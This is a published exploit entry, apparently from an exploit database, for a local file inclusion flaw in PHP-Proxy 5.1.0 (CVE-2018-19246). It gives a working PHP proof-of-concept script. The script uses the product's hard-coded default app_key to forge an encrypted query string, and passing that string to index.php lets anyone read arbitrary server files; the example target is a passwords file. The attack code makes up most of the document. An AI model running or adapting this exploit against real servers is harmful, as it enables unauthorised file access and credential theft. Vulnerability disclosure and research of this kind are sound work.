PHP-Proxy 5.1.0 Local File Inclusion

`# Exploit Title: PHP-Proxy 5.1.0 - Local File Inclusion  
# Date: 2018-11-13  
# Exploit Author: Ameer Pornillos  
# Contact: https://ethicalhackers.club  
# Vendor Homepage: https://www.php-proxy.com/  
# Software Link: https://www.php-proxy.com/download/php-proxy.zip  
# Version: 5.1.0  
# Category: Webapps  
# Tested on: XAMPP on Win10_x64  
# Description: Downloadable pre-installed version of PHP-Proxy 5.1.0   
# make use of a default app_key wherein can be used for local file inclusion  
# attacks. This can be used to generate encrypted string which   
# can gain access to arbitrary local files in the server.  
# http://php-proxy-site/index.php?q=[encrypted_string_value]  
# CVE: CVE-2018-19246  
  
# POC:   
# 1)  
# Generate encrypted string value using the PHP script below  
# 2)  
# Browse to URL   
# http://php-proxy-site/index.php?q=[encrypted_string_value]  
# to read local file  
  
<?php  
$file = "file:///C:/xampp/passwords.txt"; //example target file to read  
$ip = "192.168.0.1"; //change depending on your IP address that access the app  
$app_key = "aeb067ca0aa9a3193dce3a7264c90187";  
$key = md5($app_key.$ip);  
function str_rot_pass($str, $key, $decrypt = false){  
$key_len = strlen($key);  
$result = str_repeat(' ', strlen($str));  
for($i=0; $i<strlen($str); $i++){  
if($decrypt){  
$ascii = ord($str[$i]) - ord($key[$i % $key_len]);  
} else {  
$ascii = ord($str[$i]) + ord($key[$i % $key_len]);  
}  
$result[$i] = chr($ascii);  
}  
return $result;  
}  
function base64_url_encode($input){  
return rtrim(strtr(base64_encode($input), '+/', '-_'), '=');  
}  
echo base64_url_encode(str_rot_pass($file, $key));  
?>  
  
  
`